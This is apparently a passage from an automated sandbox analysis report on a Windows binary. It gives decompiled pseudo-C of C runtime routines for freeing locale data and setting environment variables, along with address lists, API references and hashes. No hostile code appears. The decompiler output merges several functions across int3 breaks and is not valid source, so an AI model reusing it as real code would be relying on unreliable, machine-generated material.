				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x454370) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0042E2C2(_t31);
							E0042E2C2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x50da
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E0042E2C2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0042E2C2(_t74);
			}

0x0043571a
0x0043571e
0x00435726
0x0043572f
0x00435734
0x0043573b
0x00435743
0x0043574b
0x00435756
0x0043575c
0x0043575d
0x00435765
0x0043576d
0x00435778
0x0043577e
0x00435782
0x0043578d
0x00435793
0x00435734
0x00435794
0x0043579c
0x004357af
0x004357c2
0x004357d0
0x004357db
0x004357e0
0x004357e9
0x004357f1
0x004357f2
0x004357f8
0x004357fb
0x004357fe
0x00435805
0x00435807
0x0043580b
0x00435813
0x0043581a
0x00435820
0x00435821
0x00435821
0x00435828
0x0043582a
0x0043582a
0x0043582f
0x00435837
0x0043583c
0x0043583d
0x0043583d
0x00435840
0x00435843
0x00435846
0x00435849
0x00435849
0x00435859

APIs

___free_lconv_mon.LIBCMT ref: 00435756

Part of subcall function 00434767: _free.LIBCMT ref: 00434784
Part of subcall function 00434767: _free.LIBCMT ref: 00434796
Part of subcall function 00434767: _free.LIBCMT ref: 004347A8
Part of subcall function 00434767: _free.LIBCMT ref: 004347BA
Part of subcall function 00434767: _free.LIBCMT ref: 004347CC
Part of subcall function 00434767: _free.LIBCMT ref: 004347DE
Part of subcall function 00434767: _free.LIBCMT ref: 004347F0
Part of subcall function 00434767: _free.LIBCMT ref: 00434802
Part of subcall function 00434767: _free.LIBCMT ref: 00434814
Part of subcall function 00434767: _free.LIBCMT ref: 00434826
Part of subcall function 00434767: _free.LIBCMT ref: 00434838
Part of subcall function 00434767: _free.LIBCMT ref: 0043484A
Part of subcall function 00434767: _free.LIBCMT ref: 0043485C

_free.LIBCMT ref: 0043574B

Part of subcall function 0042E2C2: HeapFree.KERNEL32(00000000,00000000,?,0042B259), ref: 0042E2D8
Part of subcall function 0042E2C2: GetLastError.KERNEL32(?,?,0042B259), ref: 0042E2EA

_free.LIBCMT ref: 0043576D
_free.LIBCMT ref: 00435782
_free.LIBCMT ref: 0043578D
_free.LIBCMT ref: 004357AF
_free.LIBCMT ref: 004357C2
_free.LIBCMT ref: 004357D0
_free.LIBCMT ref: 004357DB
_free.LIBCMT ref: 00435813
_free.LIBCMT ref: 0043581A
_free.LIBCMT ref: 00435837
_free.LIBCMT ref: 0043584F

Strings

pCE, xrefs: 004357FE

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: pCE
API String ID: 161543041-1985091739
Opcode ID: df039efdeb3ab159c45b0d12e850e990d9e9bbdd7567ee685a464dd21d44695a
Instruction ID: 81126c27f479423e05b929be11216b1fa5e5ad07db5e411f000aeaa1292ad358
Opcode Fuzzy Hash: df039efdeb3ab159c45b0d12e850e990d9e9bbdd7567ee685a464dd21d44695a
Instruction Fuzzy Hash: D9316032700A00DFDB24AA7BE845B5B73E9AF04764F51685BE459D6251DF38EC40CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00432FCB Relevance: 24.4, APIs: 16, Instructions: 411
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00432FCB(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v48;
				signed int _v100;
				signed int _v136;
				signed int _t116;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				void* _t147;
				signed int _t152;
				signed int* _t154;
				signed int* _t160;
				signed int _t166;
				signed int _t169;
				void* _t170;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t182;
				intOrPtr* _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr* _t210;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t237;
				signed int _t238;
				void* _t239;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				void* _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				WCHAR* _t302;
				signed int _t303;
				signed int _t304;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;
				void* _t324;

				_t222 = __ebx;
				_t308 = _t316;
				_t317 = _t316 - 0x10;
				_t295 = _a4;
				_t326 = _t295;
				if(_t295 != 0) {
					_push(__ebx);
					_t286 = _t295;
					_t116 = E004484C0(_t295, 0x3d);
					_v20 = _t116;
					__eflags = _t116;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E0042C135(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t116 - _t295;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t116 + 1));
							L120();
							_t222 = 0;
							__eflags =  *0x4569b4 - _t222; // 0x0
							if(__eflags != 0) {
								L14:
								_t121 =  *0x4569b4; // 0x0
								_v12 = _t121;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L39;
								} else {
									_t124 = E004335FE(_t295, _v20 - _t295);
									_v16 = _t124;
									_t237 = _v12;
									__eflags = _t124;
									if(_t124 < 0) {
										L24:
										__eflags = _v5 - _t222;
										if(_v5 == _t222) {
											goto L40;
										} else {
											_t125 =  ~_t124;
											_v16 = _t125;
											_t30 = _t125 + 2; // 0x2
											_t282 = _t30;
											__eflags = _t282 - _t125;
											if(_t282 < _t125) {
												goto L39;
											} else {
												__eflags = _t282 - 0x3fffffff;
												if(_t282 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00436D18(_t237, _t282, 4);
													E0042E2C2(_t222);
													_t128 = _v12;
													_t317 = _t317 + 0x10;
													__eflags = _t128;
													if(_t128 == 0) {
														goto L39;
													} else {
														_t238 = _v16;
														_t286 = _t222;
														 *(_t128 + _t238 * 4) = _t295;
														 *(_t128 + 4 + _t238 * 4) = _t222;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t237 - _t222;
										if( *_t237 == _t222) {
											goto L24;
										} else {
											E0042E2C2( *((intOrPtr*)(_t237 + _t124 * 4)));
											_t281 = _v16;
											__eflags = _v5 - _t222;
											if(_v5 != _t222) {
												_t286 = _t222;
												 *(_v12 + _t281 * 4) = _t295;
											} else {
												_t282 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t282 + _t281 * 4)) - _t222;
													if( *((intOrPtr*)(_t282 + _t281 * 4)) == _t222) {
														break;
													}
													 *((intOrPtr*)(_t282 + _t281 * 4)) =  *((intOrPtr*)(_t282 + 4 + _t281 * 4));
													_t281 = _t281 + 1;
													__eflags = _t281;
												}
												_v16 = E00436D18(_t282, _t281, 4);
												E0042E2C2(_t222);
												_t128 = _v16;
												_t317 = _t317 + 0x10;
												__eflags = _t128;
												if(_t128 != 0) {
													L29:
													 *0x4569b4 = _t128;
												}
											}
											__eflags = _a8 - _t222;
											if(_a8 == _t222) {
												goto L40;
											} else {
												_t239 = _t295 + 1;
												do {
													_t129 =  *_t295;
													_t295 = _t295 + 1;
													__eflags = _t129;
												} while (_t129 != 0);
												_v16 = _t295 - _t239 + 2;
												_t298 = E00430BC8(_t295 - _t239 + 2, 1);
												__eflags = _t298;
												if(_t298 == 0) {
													L37:
													E0042E2C2(_t298);
													goto L40;
												} else {
													_t133 = E0042B95B(_t298, _v16, _a4);
													_t319 = _t317 + 0xc;
													__eflags = _t133;
													if(__eflags != 0) {
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														E0042C03B();
														asm("int3");
														_push(_t308);
														_t310 = _t319;
														_t320 = _t319 - 0x10;
														_push(_t222);
														_t225 = _v48;
														__eflags = _t225;
														if(__eflags != 0) {
															_push(_t298);
															_push(_t286);
															_t288 = _t225;
															_t135 = E004088E2(_t225, 0x3d);
															_v20 = _t135;
															__eflags = _t135;
															if(__eflags == 0) {
																L81:
																 *((intOrPtr*)(E0042C135(__eflags))) = 0x16;
																goto L82;
															} else {
																__eflags = _t135 - _t225;
																if(__eflags == 0) {
																	goto L81;
																} else {
																	_t139 =  *(_t135 + 2) & 0x0000ffff;
																	_v24 = _t139;
																	_v16 = _t139;
																	E004335E4();
																	_t300 =  *0x4569b8; // 0x6b0128
																	_t226 = 0;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		L59:
																		_v20 = _v20 - _t288 >> 1;
																		_t142 = E00433653(_t288, _v20 - _t288 >> 1);
																		_v12 = _t142;
																		__eflags = _t142;
																		if(_t142 < 0) {
																			L67:
																			__eflags = _v16 - _t226;
																			if(_v16 == _t226) {
																				goto L83;
																			} else {
																				_t143 =  ~_t142;
																				_v12 = _t143;
																				_t75 = _t143 + 2; // 0x2
																				_t252 = _t75;
																				__eflags = _t252 - _t143;
																				if(_t252 < _t143) {
																					goto L82;
																				} else {
																					__eflags = _t252 - 0x3fffffff;
																					if(_t252 >= 0x3fffffff) {
																						goto L82;
																					} else {
																						_t301 = E00436D18(_t300, _t252, 4);
																						E0042E2C2(_t226);
																						_t320 = _t320 + 0x10;
																						__eflags = _t301;
																						if(_t301 == 0) {
																							goto L82;
																						} else {
																							_t253 = _v12;
																							_t288 = _t226;
																							_t146 = _v0;
																							 *(_t301 + _t253 * 4) = _t146;
																							 *(_t301 + 4 + _t253 * 4) = _t226;
																							goto L72;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *_t300 - _t226;
																			if( *_t300 == _t226) {
																				goto L67;
																			} else {
																				E0042E2C2( *((intOrPtr*)(_t300 + _t142 * 4)));
																				_t274 = _v12;
																				__eflags = _v16 - _t226;
																				if(_v16 == _t226) {
																					while(1) {
																						__eflags =  *(_t300 + _t274 * 4) - _t226;
																						if( *(_t300 + _t274 * 4) == _t226) {
																							break;
																						}
																						 *(_t300 + _t274 * 4) =  *(_t300 + 4 + _t274 * 4);
																						_t274 = _t274 + 1;
																						__eflags = _t274;
																					}
																					_t301 = E00436D18(_t300, _t274, 4);
																					E0042E2C2(_t226);
																					_t320 = _t320 + 0x10;
																					_t146 = _t288;
																					__eflags = _t301;
																					if(_t301 != 0) {
																						L72:
																						 *0x4569b8 = _t301;
																					}
																				} else {
																					_t146 = _v0;
																					_t288 = _t226;
																					 *(_t300 + _t274 * 4) = _t146;
																				}
																				__eflags = _a4 - _t226;
																				if(_a4 == _t226) {
																					goto L83;
																				} else {
																					_t254 = _t146;
																					_t84 = _t254 + 2; // 0x2
																					_t283 = _t84;
																					do {
																						_t147 =  *_t254;
																						_t254 = _t254 + 2;
																						__eflags = _t147 - _t226;
																					} while (_t147 != _t226);
																					_t85 = (_t254 - _t283 >> 1) + 2; // 0x0
																					_v16 = _t85;
																					_t302 = E00430BC8(_t85, 2);
																					_pop(_t258);
																					__eflags = _t302;
																					if(_t302 == 0) {
																						L80:
																						E0042E2C2(_t302);
																						goto L83;
																					} else {
																						_t152 = E004308DA(_t302, _v16, _v0);
																						_t322 = _t320 + 0xc;
																						__eflags = _t152;
																						if(_t152 != 0) {
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							E0042C03B();
																							asm("int3");
																							_push(_t310);
																							_t312 = _t322;
																							_push(_t288);
																							_t290 = _v100;
																							__eflags = _t290;
																							if(_t290 != 0) {
																								_t260 = 0;
																								_t154 = _t290;
																								__eflags =  *_t290;
																								if( *_t290 != 0) {
																									do {
																										_t154 =  &(_t154[1]);
																										_t260 = _t260 + 1;
																										__eflags =  *_t154;
																									} while ( *_t154 != 0);
																								}
																								_t96 = _t260 + 1; // 0x2
																								_t303 = E00430BC8(_t96, 4);
																								_t262 = _t302;
																								__eflags = _t303;
																								if(_t303 == 0) {
																									L101:
																									E0042B9D6(_t226, _t262, _t283, _t290, _t303);
																									goto L102;
																								} else {
																									_t270 =  *_t290;
																									__eflags = _t270;
																									if(_t270 == 0) {
																										L100:
																										E0042E2C2(0);
																										_t177 = _t303;
																										goto L88;
																									} else {
																										_push(_t226);
																										_t226 = _t303 - _t290;
																										__eflags = _t226;
																										do {
																											_t97 = _t270 + 1; // 0x5
																											_t283 = _t97;
																											do {
																												_t178 =  *_t270;
																												_t270 = _t270 + 1;
																												__eflags = _t178;
																											} while (_t178 != 0);
																											_t262 = _t270 - _t283;
																											_t98 = _t262 + 1; // 0x6
																											_v16 = _t98;
																											 *(_t226 + _t290) = E00430BC8(_t98, 1);
																											E0042E2C2(0);
																											_t322 = _t322 + 0xc;
																											__eflags =  *(_t226 + _t290);
																											if( *(_t226 + _t290) == 0) {
																												goto L101;
																											} else {
																												_t182 = E0042B95B( *(_t226 + _t290), _v16,  *_t290);
																												_t322 = _t322 + 0xc;
																												__eflags = _t182;
																												if(_t182 != 0) {
																													L102:
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													E0042C03B();
																													asm("int3");
																													_push(_t312);
																													_push(_t262);
																													_push(_t262);
																													_push(_t290);
																													_t291 = _v136;
																													__eflags = _t291;
																													if(_t291 != 0) {
																														_t284 = 0;
																														_t160 = _t291;
																														_t263 = 0;
																														_v20 = 0;
																														__eflags =  *_t291;
																														if( *_t291 != 0) {
																															do {
																																_t160 =  &(_t160[1]);
																																_t263 = _t263 + 1;
																																__eflags =  *_t160;
																															} while ( *_t160 != 0);
																														}
																														_t107 = _t263 + 1; // 0x2
																														_t304 = E00430BC8(_t107, 4);
																														_t265 = _t303;
																														__eflags = _t304;
																														if(_t304 == 0) {
																															L118:
																															E0042B9D6(_t226, _t265, _t284, _t291, _t304);
																															goto L119;
																														} else {
																															_t267 =  *_t291;
																															__eflags = _t267;
																															if(_t267 == 0) {
																																L117:
																																E0042E2C2(0);
																																_t169 = _t304;
																																goto L105;
																															} else {
																																_push(_t226);
																																_t226 = _t304 - _t291;
																																__eflags = _t226;
																																do {
																																	_t108 = _t267 + 2; // 0x6
																																	_t284 = _t108;
																																	do {
																																		_t170 =  *_t267;
																																		_t267 = _t267 + 2;
																																		__eflags = _t170 - _v20;
																																	} while (_t170 != _v20);
																																	_t110 = (_t267 - _t284 >> 1) + 1; // 0x3
																																	_v24 = _t110;
																																	 *(_t226 + _t291) = E00430BC8(_t110, 2);
																																	E0042E2C2(0);
																																	_t324 = _t322 + 0xc;
																																	__eflags =  *(_t226 + _t291);
																																	if( *(_t226 + _t291) == 0) {
																																		goto L118;
																																	} else {
																																		_t175 = E004308DA( *(_t226 + _t291), _v24,  *_t291);
																																		_t322 = _t324 + 0xc;
																																		__eflags = _t175;
																																		if(_t175 != 0) {
																																			L119:
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			E0042C03B();
																																			asm("int3");
																																			_t166 =  *0x4569b4; // 0x0
																																			__eflags = _t166 -  *0x4569c0; // 0x0
																																			if(__eflags == 0) {
																																				_push(_t166);
																																				L86();
																																				 *0x4569b4 = _t166;
																																				return _t166;
																																			}
																																			return _t166;
																																		} else {
																																			goto L115;
																																		}
																																	}
																																	goto L123;
																																	L115:
																																	_t291 = _t291 + 4;
																																	_t267 =  *_t291;
																																	__eflags = _t267;
																																} while (_t267 != 0);
																																goto L117;
																															}
																														}
																													} else {
																														_t169 = 0;
																														__eflags = 0;
																														L105:
																														return _t169;
																													}
																												} else {
																													goto L98;
																												}
																											}
																											goto L123;
																											L98:
																											_t290 = _t290 + 4;
																											_t270 =  *_t290;
																											__eflags = _t270;
																										} while (_t270 != 0);
																										goto L100;
																									}
																								}
																							} else {
																								_t177 = 0;
																								__eflags = 0;
																								L88:
																								return _t177;
																							}
																						} else {
																							_t272 =  &(_t302[_v20 + 1]);
																							 *((short*)(_t272 - 2)) = 0;
																							asm("sbb eax, eax");
																							__eflags = SetEnvironmentVariableW(_t302,  ~(_v24 & 0x0000ffff) & _t272);
																							if(__eflags == 0) {
																								_t191 = E0042C135(__eflags);
																								_t226 = _t226 | 0xffffffff;
																								__eflags = _t226;
																								 *_t191 = 0x2a;
																							}
																							goto L80;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t196 =  *0x4569b4; // 0x0
																		__eflags = _a4;
																		if(_a4 == 0) {
																			L52:
																			__eflags = _v16 - _t226;
																			if(_v16 != _t226) {
																				__eflags = _t196;
																				if(_t196 != 0) {
																					L57:
																					 *0x4569b8 = E00430BC8(1, 4);
																					E0042E2C2(_t226);
																					_t320 = _t320 + 0xc;
																					goto L58;
																				} else {
																					 *0x4569b4 = E00430BC8(1, 4);
																					E0042E2C2(_t226);
																					_t320 = _t320 + 0xc;
																					__eflags =  *0x4569b4 - _t226; // 0x0
																					if(__eflags == 0) {
																						goto L82;
																					} else {
																						_t300 =  *0x4569b8; // 0x6b0128
																						__eflags = _t300;
																						if(_t300 != 0) {
																							goto L59;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				_t226 = 0;
																				goto L83;
																			}
																		} else {
																			__eflags = _t196;
																			if(_t196 == 0) {
																				goto L52;
																			} else {
																				__eflags = L0042865F();
																				if(__eflags == 0) {
																					goto L81;
																				} else {
																					E004335E4();
																					L58:
																					_t300 =  *0x4569b8; // 0x6b0128
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L82:
																						_t226 = _t225 | 0xffffffff;
																						__eflags = _t226;
																						L83:
																						E0042E2C2(_t288);
																						_t138 = _t226;
																						goto L84;
																					} else {
																						goto L59;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t203 = E0042C135(__eflags);
															 *_t203 = 0x16;
															_t138 = _t203 | 0xffffffff;
															L84:
															return _t138;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t298 - _a4 - 1) = _t222;
														__eflags = E0043DB34(_v20 + 1 + _t298 - _a4, _t282, __eflags, _t298,  ~_v5 & _v20 + 0x00000001 + _t298 - _a4);
														if(__eflags == 0) {
															_t210 = E0042C135(__eflags);
															_t223 = _t222 | 0xffffffff;
															__eflags = _t223;
															 *_t210 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t222;
									if(_v5 != _t222) {
										 *0x4569b4 = E00430BC8(1, 4);
										E0042E2C2(_t222);
										_t317 = _t317 + 0xc;
										__eflags =  *0x4569b4 - _t222; // 0x0
										if(__eflags == 0) {
											L39:
											_t223 = _t222 | 0xffffffff;
											__eflags = _t223;
											goto L40;
										} else {
											__eflags =  *0x4569b8 - _t222; // 0x6b0128
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x4569b8 = E00430BC8(1, 4);
												E0042E2C2(_t222);
												_t317 = _t317 + 0xc;
												__eflags =  *0x4569b8 - _t222; // 0x6b0128
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t223 = 0;
										L40:
										E0042E2C2(_t286);
										_t119 = _t223;
										goto L41;
									}
								} else {
									__eflags =  *0x4569b8 - _t222; // 0x6b0128
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L0042865A();
										if(__eflags == 0) {
											goto L38;
										} else {
											L120();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t221 = E0042C135(_t326);
					 *_t221 = 0x16;
					_t119 = _t221 | 0xffffffff;
					L41:
					return _t119;
				}
				L123:
			}

0x00432fcb
0x00432fce
0x00432fd0
0x00432fd4
0x00432fd7
0x00432fd9
0x00432fee
0x00432ff3
0x00432ff5
0x00432ffa
0x00432fff
0x00433001
0x004331e2
0x004331e7
0x00000000
0x00433007
0x00433007
0x00433009
0x00000000
0x0043300f
0x00433012
0x00433015
0x0043301a
0x0043301c
0x00433022
0x0043309f
0x0043309f
0x004330a4
0x004330a7
0x004330a9
0x00000000
0x004330af
0x004330b6
0x004330bb
0x004330c0
0x004330c3
0x004330c5
0x00433116
0x00433116
0x00433119
0x00000000
0x0043311f
0x0043311f
0x00433121
0x00433124
0x00433124
0x00433127
0x00433129
0x00000000
0x0043312f
0x0043312f
0x00433135
0x00000000
0x0043313b
0x00433145
0x00433148
0x0043314d
0x00433150
0x00433153
0x00433155
0x00000000
0x0043315b
0x0043315b
0x0043315e
0x00433160
0x00433163
0x00000000
0x00433163
0x00433155
0x00433135
0x00433129
0x004330c7
0x004330c7
0x004330c9
0x00000000
0x004330cb
0x004330ce
0x004330d4
0x004330d7
0x004330da
0x0043310f
0x00433111
0x004330dc
0x004330dc
0x004330e9
0x004330e9
0x004330ec
0x00000000
0x00000000
0x004330e5
0x004330e8
0x004330e8
0x004330e8
0x004330f8
0x004330fb
0x00433100
0x00433103
0x00433106
0x00433108
0x00433167
0x00433167
0x00433167
0x00433108
0x0043316c
0x0043316f
0x00000000
0x00433171
0x00433171
0x00433174
0x00433174
0x00433176
0x00433177
0x00433177
0x00433183
0x0043318b
0x0043318f
0x00433191
0x004331d9
0x004331da
0x00000000
0x00433193
0x0043319a
0x0043319f
0x004331a2
0x004331a4
0x004331fe
0x004331ff
0x00433200
0x00433201
0x00433202
0x00433203
0x00433208
0x0043320b
0x0043320c
0x0043320e
0x00433211
0x00433212
0x00433215
0x00433217
0x0043322c
0x0043322d
0x00433231
0x00433233
0x00433238
0x0043323d
0x0043323f
0x00433435
0x0043343a
0x00000000
0x00433245
0x00433245
0x00433247
0x00000000
0x0043324d
0x00433251
0x00433253
0x00433256
0x00433259
0x0043325e
0x00433264
0x00433266
0x00433268
0x004332f3
0x004332fe
0x00433301
0x00433306
0x0043330b
0x0043330d
0x0043335b
0x0043335b
0x0043335f
0x00000000
0x00433365
0x00433365
0x00433367
0x0043336a
0x0043336a
0x0043336d
0x0043336f
0x00000000
0x00433375
0x00433375
0x0043337b
0x00000000
0x00433381
0x0043338b
0x0043338d
0x00433392
0x00433395
0x00433397
0x00000000
0x0043339d
0x0043339d
0x004333a0
0x004333a2
0x004333a5
0x004333a8
0x00000000
0x004333a8
0x00433397
0x0043337b
0x0043336f
0x0043330f
0x0043330f
0x00433311
0x00000000
0x00433313
0x00433316
0x0043331c
0x0043331f
0x00433323
0x0043333a
0x0043333a
0x0043333d
0x00000000
0x00000000
0x00433336
0x00433339
0x00433339
0x00433339
0x00433349
0x0043334b
0x00433350
0x00433353
0x00433355
0x00433357
0x004333ac
0x004333ac
0x004333ac
0x00433325
0x00433325
0x00433328
0x0043332a
0x0043332a
0x004333b2
0x004333b5
0x00000000
0x004333bb
0x004333bb
0x004333bd
0x004333bd
0x004333c0
0x004333c0
0x004333c3
0x004333c6
0x004333c6
0x004333d1
0x004333d5
0x004333dd
0x004333e0
0x004333e1
0x004333e3
0x0043342c
0x0043342d
0x00000000
0x004333e5
0x004333ed
0x004333f2
0x004333f5
0x004333f7
0x00433451
0x00433452
0x00433453
0x00433454
0x00433455
0x00433456
0x0043345b
0x0043345e
0x0043345f
0x00433462
0x00433463
0x00433466
0x00433468
0x0043346f
0x00433471
0x00433473
0x00433475
0x00433477
0x00433477
0x0043347a
0x0043347b
0x0043347b
0x00433477
0x00433481
0x0043348c
0x0043348f
0x00433490
0x00433492
0x004334fa
0x004334fa
0x00000000
0x00433494
0x00433494
0x00433496
0x00433498
0x004334ea
0x004334ec
0x004334f2
0x00000000
0x0043349a
0x0043349a
0x0043349d
0x0043349d
0x0043349f
0x0043349f
0x0043349f
0x004334a2
0x004334a2
0x004334a4
0x004334a5
0x004334a5
0x004334a9
0x004334ad
0x004334b1
0x004334bb
0x004334be
0x004334c3
0x004334c6
0x004334ca
0x00000000
0x004334cc
0x004334d4
0x004334d9
0x004334dc
0x004334de
0x004334ff
0x00433501
0x00433502
0x00433503
0x00433504
0x00433505
0x00433506
0x0043350b
0x0043350e
0x00433511
0x00433512
0x00433513
0x00433514
0x00433517
0x00433519
0x00433520
0x00433522
0x00433524
0x00433526
0x00433529
0x0043352b
0x0043352d
0x0043352d
0x00433530
0x00433531
0x00433531
0x0043352d
0x00433536
0x00433541
0x00433544
0x00433545
0x00433547
0x004335b8
0x004335b8
0x00000000
0x00433549
0x00433549
0x0043354b
0x0043354d
0x004335a7
0x004335aa
0x004335b0
0x00000000
0x0043354f
0x0043354f
0x00433552
0x00433552
0x00433554
0x00433554
0x00433554
0x00433557
0x00433557
0x0043355a
0x0043355d
0x0043355d
0x00433569
0x0043356d
0x00433575
0x0043357b
0x00433580
0x00433583
0x00433587
0x00000000
0x00433589
0x00433591
0x00433596
0x00433599
0x0043359b
0x004335bd
0x004335bf
0x004335c0
0x004335c1
0x004335c2
0x004335c3
0x004335c4
0x004335c9
0x004335ca
0x004335cf
0x004335d5
0x004335d7
0x004335d8
0x004335de
0x00000000
0x004335de
0x004335e3
0x00000000
0x00000000
0x00000000
0x0043359b
0x00000000
0x0043359d
0x0043359d
0x004335a0
0x004335a2
0x004335a2
0x00000000
0x004335a6
0x0043354d
0x0043351b
0x0043351b
0x0043351b
0x0043351d
0x0043351f
0x0043351f
0x00000000
0x00000000
0x00000000
0x004334de
0x00000000
0x004334e0
0x004334e0
0x004334e3
0x004334e5
0x004334e5
0x00000000
0x004334e9
0x00433498
0x0043346a
0x0043346a
0x0043346a
0x0043346c
0x0043346e
0x0043346e
0x004333f9
0x004333fd
0x00433402
0x0043340e
0x0043341a
0x0043341c
0x0043341e
0x00433423
0x00433423
0x00433426
0x00433426
0x00000000
0x0043341c
0x004333f7
0x004333e3
0x004333b5
0x00433311
0x0043326e
0x0043326e
0x00433273
0x00433276
0x00433290
0x00433290
0x00433294
0x0043329d
0x0043329f
0x004332ce
0x004332d8
0x004332dd
0x004332e2
0x00000000
0x004332a1
0x004332ab
0x004332b0
0x004332b5
0x004332b8
0x004332be
0x00000000
0x004332c4
0x004332c4
0x004332ca
0x004332cc
0x00000000
0x00000000
0x00000000
0x00000000
0x004332cc
0x004332be
0x00433296
0x00433296
0x00000000
0x00433296
0x00433278
0x00433278
0x0043327a
0x00000000
0x0043327c
0x00433281
0x00433283
0x00000000
0x00433289
0x00433289
0x004332e5
0x004332e5
0x004332eb
0x004332ed
0x00433440
0x00433440
0x00433440
0x00433443
0x00433444
0x0043344b
0x00000000
0x00000000
0x00000000
0x00000000
0x004332ed
0x00433283
0x0043327a
0x00433276
0x00433268
0x00433247
0x00433219
0x00433219
0x0043321e
0x00433224
0x0043344e
0x00433450
0x00433450
0x004331a6
0x004331b7
0x004331bb
0x004331c7
0x004331c9
0x004331cb
0x004331d0
0x004331d0
0x004331d3
0x004331d3
0x00000000
0x004331c9
0x004331a4
0x00433191
0x0043316f
0x004330c9
0x004330c5
0x00433024
0x00433024
0x00433027
0x00433045
0x00433045
0x00433048
0x0043305b
0x00433060
0x00433065
0x00433068
0x0043306e
0x004331ed
0x004331ed
0x004331ed
0x00000000
0x00433074
0x00433074
0x0043307a
0x00000000
0x0043307c
0x00433086
0x0043308b
0x00433090
0x00433093
0x00433099
0x00000000
0x00000000
0x00000000
0x00000000
0x00433099
0x0043307a
0x0043304a
0x0043304a
0x004331f0
0x004331f1
0x004331f8
0x00000000
0x004331fa
0x00433029
0x00433029
0x0043302f
0x00000000
0x00433031
0x00433036
0x00433038
0x00000000
0x0043303e
0x0043303e
0x00000000
0x0043303e
0x00433038
0x0043302f
0x00433027
0x00433022
0x00433009
0x00432fdb
0x00432fdb
0x00432fe0
0x00432fe6
0x004331fb
0x004331fd
0x004331fd
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00432FF5
_free.LIBCMT ref: 004330CE
_free.LIBCMT ref: 004330FB

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
